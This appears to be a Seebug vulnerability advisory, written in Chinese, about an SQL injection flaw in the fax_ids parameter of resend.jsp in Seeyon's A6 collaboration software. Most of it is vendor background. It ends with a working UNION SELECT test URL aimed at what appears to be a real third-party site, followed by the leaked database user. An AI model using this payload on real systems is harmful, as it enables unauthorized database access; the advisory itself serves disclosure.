用友致远A6协同管理系统resend.jsp SQL注入漏洞

2015-10-10T00:00:00
ID SSV:89634
Type seebug
Reporter feng
Modified 2015-10-10T00:00:00

Description

北京致远协创软件有限公司的致远软件连续10年获得中国协同管理软件市场占有率第一(CCID),连续6年获得中国协同软件用户满意度第一(CCW),被中国软件行业协会评为中国软件行业领军企业,是中国协同管理软件的开创者和领导者。

公司与Oracle、SAP、IBM、Microsoft、Samsung、用友、华为、中国移动、中国联通、中国电信等国内外知名企业形成长期战略合作关系。目前公司拥有1500多家合作伙伴,3000多名伙伴顾问,随时随地为客户提供全方位服务。致远协同管理软件已经拥有30000家企业级客户,每天有超过400万终端用户使用致远协同管理软件产品与服务。

在其A6协同管理软件中,由于页面: /yyoa/ext/trafaxserver/SendFax/resend.jsp 参数fax_ids过滤不严格存在SQL注入漏洞产生。

简单测试方法:

http://www.ssepec.net/yyoa/ext/trafaxserver/SendFax/resend.jsp?fax_ids=(1)%20and%201=2%20union%20select%20user()%20--

java.sql.SQLException: Invalid value for getInt() - 'root@localhost'